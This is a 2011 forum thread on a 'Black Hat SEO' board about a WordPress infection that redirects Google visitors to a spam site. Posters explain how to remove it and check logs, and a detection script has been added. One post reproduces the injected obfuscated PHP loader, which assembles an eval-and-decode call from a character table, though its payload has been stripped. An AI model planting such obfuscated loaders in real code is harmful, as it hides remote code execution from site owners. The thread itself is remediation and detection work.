
UniqText.com Redirect Hack ~ WordPress Shared Hosting via HOSTGATOR

Discussion in 'Black Hat SEO' started by SuperLinks, Sep 16, 2011.

  1. SuperLinks

    SuperLinks Elite Member

    Are you using Wordpress via Hostgator Shared Hosting? Chances are you've probably been hacked. I have several shared hosting accounts with Hostgator in which 2/3 were hacked and had this problem.

    How the hack works:

    When a user searches Google for a keyword that you rank for and clicks on your search result they will be redirected to http://uniqtext.com/search.php?theme=KEYWORD

    This will only happen the first time; if someone searches your site and finds it in the SERPs again it will go to your actual website. This hack uses some sort of "throttling", which means that it may not happen the first time for everyone either. My sites' Analytics that were affected "flatlined" to within ~10-15 visits each day. As you know, most sites' Analytics fluctuate greatly but these flatlined completely, reducing my overall traffic by 30%.

    How to identify and fix the problem:


    The affected hack adds some type of encrypted PHP to your functions.php.

    Via FTP navigate to domain.com/wp-include/functions.php
    The first 6 lines will have something that looks like this
    I have truncated most of it, but that's the general idea. In order to fix it you will want to remove everything between

    Again this should be the first six lines of code ONLY. Reupload the fixed functions.php and have a friend do a Google check on a fresh IP/computer to see if you fixed it properly.

    I would recommend fixing this problem ASAP. Two of my websites have lost #1 rankings as a result of this. I'm sure the bounce rate was HORRIBLE and Google wasn't pleased.
     
  2. ivanblack

    ivanblack Newbie

    Thanks for your share, that's very helpful.

    Why could it happen like that? Has a person entered my cPanel account? Or is it using SQL injection? What should I do to prevent it happening again in my cPanel? I use Hostgator shared hosting.

    This is the script on my cpanel

    Code:
    <?php
    $md5 = "52f289525dfdf65f6c01f0b24284afd9";
    $wp_salt = array('e',';','a','s','d',"g",'z','$',"4","n",'o',"(",'f','l','b',"c",'6',"t","v","i",')','r',"_");
    $wp_add_filter = create_function('$'.'v',$wp_salt[0].$wp_salt[18].$wp_salt[2].$wp_salt[13].$wp_salt[11].$wp_salt[5].$wp_salt[6].$wp_salt[19].$wp_salt[9].$wp_salt[12].$wp_salt[13].$wp_salt[2].$wp_salt[17].$wp_salt[0].$wp_salt[11].$wp_salt[14].$wp_salt[2].$wp_salt[3].$wp_salt[0].$wp_salt[16].$wp_salt[8].$wp_salt[22].$wp_salt[4].$wp_salt[0].$wp_salt[15].$wp_salt[10].$wp_salt[4].$wp_salt[0].$wp_salt[11].$wp_salt[7].$wp_salt[18].$wp_salt[20].$wp_salt[20].$wp_salt[20].$wp_salt[1]);
    $wp_add_filter('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');
    ?>
     
    Last edited: Sep 18, 2011
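
Added example (not part of any post in this thread): a static check, in Python, that rebuilds the string the snippet above assembles from `$wp_salt` without executing any PHP, and flags it when it contains calls such as `eval` or `base64_decode`. The function names, the `DANGEROUS` list and the `PAYLOAD_PLACEHOLDER` string are assumptions made for illustration.

```python
import re

ARRAY_START = re.compile(r'\$(\w+)\s*=\s*array\s*\(')
# One quoted element plus its terminator; assumes the literals hold no escapes.
ELEMENT = re.compile(r'''\s*(?:'([^']*)'|"([^"]*)")\s*([,)])''')
CHAIN = re.compile(r'\$\w+\[\d+\](?:\s*\.\s*\$\w+\[\d+\])+')
LOOKUP = re.compile(r'\$(\w+)\[(\d+)\]')
DANGEROUS = ("eval", "assert", "gzinflate", "base64_decode", "str_rot13")

def parse_arrays(src):
    """Return {name: [elements]} for each PHP array made only of string literals."""
    tables = {}
    for m in ARRAY_START.finditer(src):
        items, pos = [], m.end()
        while (e := ELEMENT.match(src, pos)):
            items.append(e.group(1) if e.group(1) is not None else e.group(2))
            pos = e.end()
            if e.group(3) == ")":
                tables[m.group(1)] = items
                break
    return tables

def resolve_chains(src):
    """Rebuild every $arr[i].$arr[j]... concatenation without running any PHP."""
    tables, out = parse_arrays(src), []
    for chain in CHAIN.finditer(src):
        try:
            out.append("".join(tables[n][int(i)]
                               for n, i in LOOKUP.findall(chain.group(0))))
        except (KeyError, IndexError):
            continue  # chain indexes something that was not parsed
    return out

def scan(src):
    """Return [(decoded string, [dangerous calls in it])] for flagged chains."""
    hits = [(d, [f for f in DANGEROUS if re.search(rf'\b{f}\s*\(', d)])
            for d in resolve_chains(src)]
    return [h for h in hits if h[1]]

# Sample rebuilt from the post above; the payload string is a placeholder.
IDX = [0, 18, 2, 13, 11, 5, 6, 19, 9, 12, 13, 2, 17, 0, 11, 14, 2, 3, 0, 16, 8,
       22, 4, 0, 15, 10, 4, 0, 11, 7, 18, 20, 20, 20, 1]
ARRAY = r'''$wp_salt = array('e',';','a','s','d',"g",'z','$',"4","n",'o',"(",'f','l','b',"c",'6',"t","v","i",')','r',"_");'''
SAMPLE = ("<?php\n" + ARRAY + "\n$wp_add_filter = create_function('$'.'v',"
          + ".".join(f"$wp_salt[{i}]" for i in IDX) + ");\n"
          "$wp_add_filter('PAYLOAD_PLACEHOLDER');\n?>")

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Running `scan()` over the text of each `.php` file in a WordPress tree lists the files that carry this kind of character-table wrapper, which is useful given the report further down the thread that the code is injected into every PHP file.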
  3. kvmcable

    kvmcable Supreme Member

    Look at the file date in FTP; that will tell you when it changed. Then check the logs for activity during that time. Check Apache and FTP logs. That will tell you how they got in and what exploit they used. Also it will tell you what IP they used. Ban the whole C Block if from China or Russia. They'll be back for sure.
     
  4. thesuvo

    thesuvo Registered Member

    Thanks man for this fix. It's really helpful. My website got affected on Sept 4, 2011 at 11.25PM.
     
  5. dried cassava

    dried cassava Newbie

    I host at Bluehost, and it happened to almost all of my blogs! Thanks a lot, SuperLinks.
     
  6. blackmamba456

    blackmamba456 Junior Member

    It happened to all my blogs a while back too. It injects the code into every single php file in wordpress, which makes it a pain to remove manually. There is a script that cleans your files automatically.

    Code:
    http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html